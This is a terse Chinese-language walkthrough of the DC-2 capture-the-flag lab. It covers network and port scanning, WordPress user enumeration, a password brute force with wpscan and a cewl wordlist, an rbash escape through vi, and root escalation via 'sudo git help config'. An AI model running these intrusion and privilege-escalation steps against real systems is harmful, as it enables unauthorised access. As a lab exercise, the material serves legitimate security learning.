DC-2
扫描局域网内所有设备
arp-scan -l
nmap -p- -sV 扫描所有端口
880,7744端口,访问一下进不去
只能改hosts文件进去
页面使用的技术
用awvs扫一下(awvs yyds!)
可是好像msf没有收录这些漏洞
flag提示用cewl
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件
cewl http://dc-2 -w 1.txt
nikto工具扫描后台
nikto -host http://192.168.xx.xx (默认扫描80端口)
wpscan(kali中针对wordpress的漏洞扫描工具)
wpscan --url http://www.xxxxx.wiki/
admin jerry tom
$ wpscan --url http://dc-2 -U /home/t123/桌面/user.txt -P /home/t123/桌面/cewl.txt //不知道路径可以用pwd看看
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
登录,查看到flag2
ssh链接后rbash
如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受
限
绕过rbash
compgen -c //查看当前用户可执行命名,发现有vi
vi编辑器绕过
在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash在这里插入代码片
这里就直接将shell设置为/bin/bash
接着在执行命令 :shell
就好了
然后就有一个无限制的shell了
绕过rbash
git提权
sudo git help config